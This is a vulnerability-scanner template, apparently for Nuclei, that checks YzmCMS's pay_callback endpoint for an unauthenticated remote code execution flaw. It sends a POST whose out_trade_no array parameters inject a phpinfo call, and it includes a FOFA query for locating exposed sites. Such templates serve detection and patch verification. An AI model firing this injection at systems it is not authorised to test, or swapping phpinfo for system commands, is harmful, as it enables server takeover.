http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - phpinfo()
            - PHP Version
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /pay/index/pay_callback.html HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo
id: YzmCMS-pay_callback-RCE
info:
    author: Superhero
    description: |-
        fofa: app="yzmcms"
        YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统指令，写入后门文件，最终可获取服务器权限。
    name: YzmCMS pay_callback 远程命令执行漏洞
    reference:
        - https://blog.csdn.net/m0_60571842/article/details/140112191
    severity: high
    tags:
        - RCE
